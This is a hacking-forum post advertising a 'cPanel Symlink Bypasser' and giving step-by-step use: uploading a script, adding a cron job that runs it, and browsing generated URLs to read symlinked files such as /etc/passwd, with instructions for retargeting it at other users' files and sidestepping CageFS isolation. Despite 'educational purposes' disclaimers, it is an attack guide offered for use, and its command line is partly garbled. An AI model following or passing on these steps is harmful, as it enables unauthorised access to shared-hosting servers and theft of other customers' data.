Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


CPanel Symlink Bypasser [Public Version]

  • 0 Vote(s) - 0 Average


03-21-2017, 09:55 AM #1
Hannibal Ksa Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:15 Threads:10 Joined:May 2014 Reputation: 6
Mood: Stoned
Hi All!

Today we have a way to bypass cPanel servers !
By me (Hannibal Ksa) & R3m0t3 Nu11 

the author's not resposible for any damage, use at your own risk!


First download this file:


then upload it in /home/user
[Image: proxy?url=http%3A%2F%2Foi60.tinypic.com%...=image%2F*]







Code:
echo "Alm3refh bypass" ~| bash priv8.sh -s "Alm3refh bypass" -- [email protected]


then go to cron jobs and add this command:






[email protected] = your email




Once you add the command, you will receive some links in your email ..

example for the links:



[Image: proxy?url=http%3A%2F%2Foi61.tinypic.com%...=image%2F*]

https://yourbitch:2083/cpsession/tmp/user/webalizerftp/bypass1337.html



yourbitch=cpanel URL
cpsession=your cpanel session
 
[!] NOTE: bypass1337 = bypass102 
To make it easy, add the following after the cpanel URL:
 tmp/user/webalizerftp/bypass102.html
  
"THE FIRST THREE EXPLOITS ARE THE SAME USAGE"



https://yourbitch:2083/cpsession/frontend/x3/raw/index.html


yourbitch=cpanel URL
cpsession=your cpanel session
 
[!] NOTE: bypass1337 = bypass102

Scroll down and you'll see your file/symlink

bypass102.ini


Some pics for the exploits:

[Image: proxy?url=http%3A%2F%2Foi58.tinypic.com%...=image%2F*]


[Image: proxy?url=http%3A%2F%2Foi57.tinypic.com%...=image%2F*]


[Image: proxy?url=http%3A%2F%2Foi62.tinypic.com%...=image%2F*]


To change the file you want to make a symlink of edit the tool:

SYM="/etc/passwd"



We used /etc/passwd,
Although the tool bypasses the CageFS (Cloud) with the passwd file only!
But if the server doesn't uses CageFS it'll bypass user's files Biggrinsmiley


Don't forget to re-upload/edit the file after changing the target's file !

Also, the file using base64, if the server you're on doesn't have that feature. decode the file wink


cheers!

./hk

uNdErGrOuNd
hk @ r00t3rz






Forum Jump:


Users browsing this thread:1 Guest(s)